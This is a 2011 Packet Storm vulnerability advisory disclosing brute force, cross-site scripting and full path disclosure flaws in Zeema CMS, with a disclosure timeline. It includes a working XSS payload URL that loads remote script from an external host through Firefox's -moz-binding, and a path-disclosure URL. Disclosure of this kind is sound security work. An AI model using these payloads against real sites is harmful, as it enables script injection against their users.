Zeema CMS Cross Site Scripting / Path Disclosure

2011-12-04T00:00:00
ID PACKETSTORM:107509
Type packetstorm
Reporter MustLive
Modified 2011-12-04T00:00:00

Description

                                        
                                            `Hello list!  
  
I want to warn you about Brute Force, Cross-Site Scripting and Full path  
disclosure vulnerabilities in Zeema CMS. It's Ukrainian commercial CMS.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are all versions of Zeema CMS.  
  
----------  
Details:  
----------  
  
Brute Force (WASC-11):  
  
http://site/cms/  
  
XSS (WASC-08):  
  
http://site/search/?query=%22%20style=%22-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml%23xss)  
  
Attack will work in Mozilla and Firefox.  
  
Full path disclosure (WASC-13):  
  
http://site/search/?page=10&query=site  
  
------------  
Timeline:  
------------  
  
2011.09.12 - found vulnerabilities during audit. After that client straight  
away informed developers.  
2011.10.22 - announced at my site.  
2011.10.23 - informed developers.  
2011.12.02 - disclosed at my site.  
  
I mentioned about these vulnerabilities at my site  
(http://websecurity.com.ua/5459/).  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua  
  
`